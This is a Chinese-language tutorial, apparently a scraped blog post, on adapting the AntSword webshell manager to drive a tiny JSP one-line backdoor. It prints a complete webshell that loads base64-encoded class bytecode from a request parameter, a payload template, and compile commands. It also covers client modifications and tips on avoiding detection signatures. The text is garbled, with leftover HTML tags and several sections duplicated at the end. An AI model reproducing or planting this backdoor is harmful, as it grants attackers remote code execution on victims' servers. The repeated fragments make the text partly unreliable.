蚁剑改造计划：实现JSP一句话木马<\/h1>

前言<\/h2>
本文详细讲解如何改造蚁剑(AntSword)以支持JSP一句话木马功能。传统JSP木马体积庞大（菜刀7KB，蚁剑17KB），而通过动态加载字节码技术可以实现更小巧高效的后门。<\/p>

基本原理<\/h2>
Java中没有eval函数，传统JSP木马采用custom模式，将执行代码预写入shell中。冰蝎作者提出创新思路：利用ClassLoader直接解析编译后的class字节码，实现类似eval的功能。<\/p>

实现思路<\/h2>

思路选择<\/strong>：<\/p>

用Node.js修改Java字节码（难度大）<\/li>
编写专门生成payload的jar包（需Java环境）<\/li>
硬编码payload+参数传参（本文采用）<\/li> <\/ul> <\/li>

核心优势<\/strong>：<\/p>

重写Object类的equals方法<\/li>
传入pageContext控制页面对象<\/li>
避免类反射特征<\/li> <\/ul> <\/li> <\/ol>
具体实现<\/h2>
1. Shell模板<\/h3>
<%!class U extends ClassLoader{ U(ClassLoader c){ super(c); }public Class g(byte []b){ return super.defineClass(b,0,b.length); }}%> <% String cls=request.getParameter("ant");if(cls!=null){ new U(this.getClass().getClassLoader()).g(new sun.misc.BASE64Decoder().decodeBuffer(cls)).newInstance().equals(pageContext); }%> <\/code><\/pre> 压缩后仅316字节，比冰蝎更小。<\/p> 2. Payload模板<\/h3> import<\/span> javax.servlet.ServletRequest;<\/span> <\/span><\/span>import<\/span> javax.servlet.ServletResponse;<\/span> <\/span><\/span>import<\/span> javax.servlet.jsp.PageContext;<\/span> <\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Demo<\/span> {<\/span> <\/span><\/span> public<\/span> String encoder;<\/span> <\/span><\/span> public<\/span> String cs;<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> boolean<\/span> equals<\/span>(<\/span>Object obj)<\/span> {<\/span> <\/span><\/span> PageContext page =<\/span> (<\/span>PageContext)<\/span>obj;<\/span> <\/span><\/span> ServletRequest request =<\/span> page.<\/span>getRequest<\/span>();<\/span> <\/span><\/span> ServletResponse response =<\/span> page.<\/span>getResponse<\/span>();<\/span> <\/span><\/span> encoder =<\/span> request.<\/span>getParameter<\/span>(<\/span>"encoder"<\/span>)!=<\/span>null<\/span>?<\/span>request.<\/span>getParameter<\/span>(<\/span>"encoder"<\/span>):<\/span>""<\/span>;<\/span> <\/span><\/span> cs=<\/span>request.<\/span>getParameter<\/span>(<\/span>"charset"<\/span>)!=<\/span>null<\/span>?<\/span>request.<\/span>getParameter<\/span>(<\/span>"charset"<\/span>):<\/span>"UTF-8"<\/span>;<\/span> <\/span><\/span> StringBuffer output =<\/span> new<\/span> StringBuffer(<\/span>""<\/span>);<\/span> <\/span><\/span> StringBuffer sb =<\/span> new<\/span> StringBuffer(<\/span>""<\/span>);<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> response.<\/span>setContentType<\/span>(<\/span>"text\/html"<\/span>);<\/span> <\/span><\/span> request.<\/span>setCharacterEncoding<\/span>(<\/span>cs);<\/span> <\/span><\/span> response.<\/span>setCharacterEncoding<\/span>(<\/span>cs);<\/span> <\/span><\/span> String var0 =<\/span> EC(<\/span>decode(<\/span>request.<\/span>getParameter<\/span>(<\/span>"var0"<\/span>)+<\/span>""<\/span>));<\/span> <\/span><\/span> String var1 =<\/span> EC(<\/span>decode(<\/span>request.<\/span>getParameter<\/span>(<\/span>"var1"<\/span>)+<\/span>""<\/span>));<\/span> <\/span><\/span> String var2 =<\/span> EC(<\/span>decode(<\/span>request.<\/span>getParameter<\/span>(<\/span>"var2"<\/span>)+<\/span>""<\/span>));<\/span> <\/span><\/span> String var3 =<\/span> EC(<\/span>decode(<\/span>request.<\/span>getParameter<\/span>(<\/span>"var3"<\/span>)+<\/span>""<\/span>));<\/span> <\/span><\/span> output.<\/span>append<\/span>(<\/span>"->"<\/span> +<\/span> "|"<\/span>);<\/span> <\/span><\/span> sb.<\/span>append<\/span>(<\/span>func(<\/span>var1));<\/span> <\/span><\/span> output.<\/span>append<\/span>(<\/span>sb.<\/span>toString<\/span>());<\/span> <\/span><\/span> output.<\/span>append<\/span>(<\/span>"|"<\/span> +<\/span> "<-"<\/span>);<\/span> <\/span><\/span> page.<\/span>getOut<\/span>().<\/span>print<\/span>(<\/span>output.<\/span>toString<\/span>());<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> sb.<\/span>append<\/span>(<\/span>"ERROR"<\/span> +<\/span> ":\/\/ "<\/span> +<\/span> e.<\/span>toString<\/span>());<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> true<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 其他方法... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 编译环境<\/h3> 使用JDK 1.6编译（向下兼容）<\/li> 依赖tomcat7的jar包<\/li> 编译命令： javac -cp "servlet-api.jar;jsp-api.jar"<\/span> Test.java <\/span><\/span><\/code><\/pre><\/li> 保存字节码： base64 -w 0<\/span> Test.class > Test.txt <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4. 编码问题解决<\/h3> 关键修改<\/strong>：<\/p> 交换解码和字符集判断的顺序<\/li> 强制使用UTF-8解码base64内容<\/li> 处理中文路径问题<\/li> <\/ol> 5. 蚁剑客户端修改<\/h3> 在以下文件中增加jsp类型支持：<\/p> source\/app.entry.js<\/code><\/li> source\/core\/index.js<\/code><\/li> source\/modules\/settings\/encoders.js<\/code><\/li> <\/ul> <\/li> 在source\/modules\/shellmanager\/list\/form.js<\/code>增加jsp后缀识别<\/p> <\/li> 在base64编码器模板中增加发送接口<\/p> <\/li> 用编译后的payload替换原函数名<\/p> <\/li> <\/ol> 使用示例<\/h2> 示例payload（返回"Hello"+名字）：<\/li> <\/ol> String test<\/span>(<\/span>String var0){<\/span> <\/span><\/span> return<\/span> "Hello"<\/span> +<\/span> var0;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 发送请求：<\/li> <\/ol> 明文：var0=yzddmr6<\/code><\/li> Base64编码：encoder=base64<\/code>（需URL编码）<\/li> <\/ul> 注意事项<\/h2> 必须URL编码<\/strong>所有请求参数<\/li> 默认编码器不支持中文路径<\/li> 不建议添加回显编码函数（会增加特征）<\/li> 目前存在硬编码特征，尚未实现随机变量名<\/li> <\/ol> 项目资源<\/h2> 修改后的蚁剑(2.1.x分支)：https:\/\/github.com\/yzddmr6\/antSword\/tree\/v2.1.x<\/a><\/li> JSP payload源码：JspForAntSword<\/a><\/li> <\/ul> 总结<\/h2> 通过动态加载字节码技术，实现了体积小巧的JSP一句话木马，完美支持中文路径和多种编码方式。虽然目前存在一些硬编码特征，但为蚁剑的JSP支持提供了新的解决方案。<\/p>

蚁剑改造计划：实现JSP一句话木马<\/h1>

前言<\/h2> 本文详细讲解如何改造蚁剑(AntSword)以支持JSP一句话木马功能。传统JSP木马体积庞大（菜刀7KB，蚁剑17KB），而通过动态加载字节码技术可以实现更小巧高效的后门。<\/p>

基本原理<\/h2> Java中没有eval函数，传统JSP木马采用custom模式，将执行代码预写入shell中。冰蝎作者提出创新思路：利用ClassLoader直接解析编译后的class字节码，实现类似eval的功能。<\/p>

具体实现<\/h2>

总结<\/h2> 通过动态加载字节码技术，实现了体积小巧的JSP一句话木马，完美支持中文路径和多种编码方式。虽然目前存在一些硬编码特征，但为蚁剑的JSP支持提供了新的解决方案。<\/p>

前言<\/h2>
本文详细讲解如何改造蚁剑(AntSword)以支持JSP一句话木马功能。传统JSP木马体积庞大（菜刀7KB，蚁剑17KB），而通过动态加载字节码技术可以实现更小巧高效的后门。<\/p>

基本原理<\/h2>
Java中没有eval函数，传统JSP木马采用custom模式，将执行代码预写入shell中。冰蝎作者提出创新思路：利用ClassLoader直接解析编译后的class字节码，实现类似eval的功能。<\/p>

总结<\/h2>
通过动态加载字节码技术，实现了体积小巧的JSP一句话木马，完美支持中文路径和多种编码方式。虽然目前存在一些硬编码特征，但为蚁剑的JSP支持提供了新的解决方案。<\/p>